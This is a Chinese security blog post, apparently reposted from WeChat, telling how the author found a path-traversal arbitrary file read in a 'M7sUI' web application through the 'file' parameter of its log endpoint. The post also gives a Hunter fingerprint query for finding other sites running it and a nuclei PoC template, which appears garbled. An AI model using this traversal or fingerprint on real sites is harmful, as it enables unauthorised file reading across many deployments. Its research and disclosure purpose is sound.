逐个看看各事件的详细信息,目光锁定在了一个数据包上,低危三十年的直觉告诉我,这里有戏。
把数据包粘贴到yakit,测试一下这个file参数,由于之前对这个ip地址做过端口扫描,知道它开放了3389端口,那么很显然他就是一台windows机器,所以直接测试win.ini文件
没读成功,通过响应可以知道,当前是在log目录下的,那试试../来目录穿越一下,一不小心就成了
一个任意文件读取到手,可以直接下班写报告了
到这就结束了?nonono!强烈的第六感告诉我,这是一个通用站点,尝试从hunter上搜一搜指纹
web.body=
"static/js/chunk-libs.9540f991.js"
这不就来了嘛
由于搭建的网站的不同,linux网站需要用/etc/passwd来进行测试
下面附上nuclei的poc
id
: M7sUI-fileread
info
:
name
:
M7sUI任意文件读取
author
:
斯叔
severity
:
high
requests
:
method: GET
path
:
'{{BaseURL}}/api/logrotate/open?file='
:
and
matchers
:
type: word
part
:
body
words
:
'log'
type: status
status
:
200
原文始发于微信公众号(跟着斯叔唠安全):从AWVS低危到通杀任意文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论